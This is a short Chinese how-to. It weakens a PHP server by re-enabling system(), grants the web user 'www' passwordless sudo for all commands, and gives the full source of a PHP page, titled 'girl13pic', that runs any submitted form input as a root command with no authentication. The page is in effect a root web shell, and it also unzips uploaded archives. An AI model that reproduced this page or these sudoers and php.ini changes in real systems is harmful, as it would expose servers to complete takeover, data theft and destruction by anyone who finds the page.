先修改php函数启用system
vi /usr/local/php/etc/php.ini
disable functions 里面删除system
修改php账号执行权限www
vi /etc/sudoers
...
root ALL=(ALL) ALL
这里复制一行: www ALL=(ALL) NOPASSWD:ALL
下面是一个简单php页面,输入命令行:
<!DOCTYPE html> <html lang="zh-CN"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1"> <title>girl13pic</title> <style> *{font-size:14px;text-decoration:none;font:normal 19px/1.5 PMingLiU, MingLiU;margin:0;padding:0;} a{color:#369;} body{-webkit-text-size-adjust:none;min-width:320px;background:#fff;padding:10px} h1{padding:0;text-align:left;font:normal 20px/1 PMingLiU, MingLiU;color:#333;} h2{padding:10px 20px;border-top:1px dashed #fff;text-align:right} div{font-size:16px;line-height:30px;color:#333;text-align:left;padding:5px;background:#fff} article{text-align:left;color:#333;} p{padding:0 0 10px;text-align:left;color:#333;} i{display:block;font-size:11px;text-align:right;letter-spacing:2px;padding:10px;} i a{font-size:11px;} #divcss{position: fixed;left:0;bottom: 0;width: 100%} #cici{width:90%;height:50px;line-height:50px;} </style> </head> <body> <p><a href="p.php">P</a> <a href="hwj_up.php">up</a> <a href="?v=1">cmd</a> <a href="?unzip">unzip</a></p> <div id="divcss"> <form method="post"> <input type="test" name="cmd" id="cici" /> <input type="submit" value="go" /> </form> </div> <pre> <?php if(isset($_POST['cmd'])){ $cmd=$_POST['cmd']; echo "<p><b># $cmd</b></p>"; system("sudo ".$cmd); }elseif(isset($_GET['unzip'])){ system("mv ./tmp/udist.zip ../"); system("sudo unzip -o ../udist.zip -d ../"); system("rm -f ../udist.zip"); }else{ echo shell_exec("id -a"); system("sudo lnmp status"); system("sudo date"); system("pwd"); system("sudo ls -la ./tmp/"); } ?> </pre> <script> window.onload=function(){document.getElementById('cici').focus();} </script> </body> </html>
